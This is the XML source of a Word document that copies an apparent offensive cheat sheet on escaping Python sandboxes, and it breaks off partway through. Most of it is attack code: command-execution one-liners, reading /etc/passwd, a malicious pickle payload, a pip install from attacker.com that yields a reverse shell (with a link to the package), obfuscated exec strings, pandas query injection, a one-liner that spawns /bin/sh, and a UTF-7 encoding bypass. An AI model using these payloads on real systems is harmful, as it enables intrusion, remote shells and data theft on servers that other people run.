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1003C" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRPr="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7C98">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-6"/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:eastAsia="en-IN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Bypass Python sandboxes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8B4BE8" w14:textId="77777777" w:rsidR="00240D72" w:rsidRDefault="00240D72"/>
    <w:p w14:paraId="018D4C83" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98"/>
    <w:p w14:paraId="43BD36CA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These are some tricks to bypass python sandbox protections and execute arbitrary commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEBBC06" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Command Execution Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A990774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first thing you need to know is if you can directly execute code with some already imported library, or if you could import any of these libraries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBF9561" w14:textId="73AACCC1" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD27277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os.system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777E4353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os.popen("ls").read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E9D05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commands.getstatusoutput("ls") </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EAB04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commands.getoutput("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6379C512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commands.getstatus("file/path")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A3A9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subprocess.call("ls", shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6F17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subprocess.Popen("ls", shell=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A8C65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pty.spawn("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08C593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pty.spawn("/bin/bash")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51906BCC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platform.os.system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C845152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pdb.os.system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3072F4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3CB6F560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#Import functions to execute commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F02BBB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importlib.import_module("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA8632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importlib.__import__("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458AD6CC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imp.load_source("os","/usr/lib/python3.8/os.py").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5F3782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imp.os.system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1698B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imp.sys.modules["os"].system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9AC1F4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sys.modules["os"].system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0F79EB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__import__("os").system("ls")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC502C3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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7407DD3C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from os import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBF444D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00AC2168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#Other interesting functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A47C1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open("/etc/passwd").read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EFA110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open('/var/www/html/input', 'w').write('123')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4102C1F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21D83B2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#In Python2.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F62553A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execfile('/usr/lib/python2.7/os.py')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6CA141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lastRenderedPageBreak/>
        <w:t>system('ls')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34733F50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Remember that the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>open</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> functions can be useful to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read files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the python sandbox and to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write some code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> that you could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execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> to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bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> the sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4450ADEA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Python2 input()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> function allows executing python code before the program crashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662CB948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Python try to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load libraries from the current directory first</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> (the following command will print where is python loading modules from): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>python3 -c 'import sys; print(sys.path)'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCCDFBD" w14:textId="475728E9" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71D6425F" wp14:editId="779918BE">
            <wp:extent cx="3909060" cy="1592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034AB" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Bypass pickle sandbox with the default installed python packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E16A40" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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Default packages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5E2D5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You can find a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list of pre-installed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> packages here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note that from a pickle you can make the python env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import arbitrary libraries</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed in the system. For example, the following pickle, when loaded, is going to import the pip library to use it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACBC718" w14:textId="4FE3DF3E" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A1A2A8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#Note that here we are importing the pip library so the pickle is created correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E9F70C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#however, the victim doesn't even need to have the library installed to execute it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B77667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#the library is going to be loaded automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04462E9B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137693FA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import pickle, os, base64, pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4717A2FB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class P(object):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D443C2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def __reduce__(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A385BBF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return (pip.main,(["list"],))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F246202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31D0ECB3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lastRenderedPageBreak/>
        <w:t>print(base64.b64encode(pickle.dumps(P(), protocol=0)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3715602D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For more information about how pickle works check this: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>https://checkoway.net/musings/pickle/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A176D52" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Pip package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC9CDDC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Trick shared by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@isHaacK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEB6069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If you have access to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>pip.main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> you can install an arbitrary package and obtain a reverse shell calling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDEA724" w14:textId="1169F3B4" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BBEC174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pip install http://attacker.com/Rerverse.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101073E2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pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623A5893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You can download the package to create the reverse shell here. Please, note that before using it you should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 xml:space="preserve">decompress it, change the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>setup.py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, and put your IP for the reverse shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7364F76F" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText>HYPERLINK "https://129538173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2Fgit-blob-3d8a632065b3179ece5bc038025f8126ced8f256%2FReverse.tar.gz?alt=media"</w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="03755D15" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48809691" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="6" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Reverse.tar.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D0B66" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B0FE9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This package is called </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>Reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve">. However, it was specially crafted so that when you exit the reverse shell the rest of the installation will fail, so you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won't leave any extra python package installed on the server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> when you leave.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AE3EE7" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Eval-ing python code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EAFF4EA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Note that exec allows multiline strings and ";", but eval doesn't (check walrus operator)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F539C68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If certain characters are forbidden you can use the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hex/octal/B64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> representation to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bypass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> the restriction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A43518" w14:textId="0DC1DCCE" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3795C88A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exec("print('RCE'); __import__('os').system('ls')") #Using ";"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083B227D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exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA6CC68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eval("__import__('os').system('ls')") #Eval doesn't allow ";"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFC9810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eval(compile('print("hello world"); print("heyy")', '&lt;stdin&gt;', 'exec')) #This way eval accept ";"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21624EF8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lastRenderedPageBreak/>
        <w:t>__import__('timeit').timeit("__import__('os').system('ls')",number=1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537C3990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#One liners that allow new lines and tabs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB92F5D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eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '&lt;stdin&gt;', 'exec'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5AEBC2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exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '&lt;stdin&gt;', 'exec'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61135DAC" w14:textId="0570AFC0" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD746A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#Octal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C67D3B0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exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630BDDC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#Hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F0803C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exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73743311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#Base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD818FF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exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C43D85C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exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D02694" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Other libraries that allow to eval python code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964B77B" w14:textId="2A4FCD28" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DFE0F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#Pandas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C66A87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import pandas as pd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F18E1E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df = pd.read_csv("currency-rates.csv")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE5DCE7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df.query('@__builtins__.__import__("os").system("ls")')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2658791D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df.query("@pd.io.common.os.popen('ls').read()")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2B164B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df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F02FD0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20B2082E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The previous options work but others you might try give the error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F0923E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Only named functions are supported</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702743F0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Like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D665236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df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CBD8E" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Operators and short tricks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB0C58D" w14:textId="4F72644F" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7797B1AC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walrus operator allows generating variable inside a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118812A4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## everything will be executed in order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FDA7F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## From https://ur4ndom.dev/posts/2020-06-29-0ctf-quals-pyaucalc/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AE0777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[a:=21,a*2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37612517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[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), </w:t>
      </w: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lastRenderedPageBreak/>
        <w:t>y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8BA6D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## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29749D9F" w14:textId="77777777" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C98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6"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>Bypassing protections through encodings (UTF-7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CFB52D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In </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:anchor="misc-latexipy" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Strong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this writeup</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> UFT-7 is used to load and execute arbitrary python code inside an apparent sandbox:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30666613" w14:textId="0EB869FB" w:rsidR="00BD7C98" w:rsidRDefault="00BD7C98" w:rsidP="00BD7C9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6366C1F0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assert b"+AAo-".decode("utf_7") == "\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782B089F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25F6C64E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payload = """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072272A2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-*- coding: utf_7 -*-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F947197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def f(x):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD6854D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return x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC48D7A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#+AAo-print(open("/flag.txt").read())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B744522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""".lstrip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768CEB96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It is also possible to bypass it using other encodings, e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>raw_unicode_escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
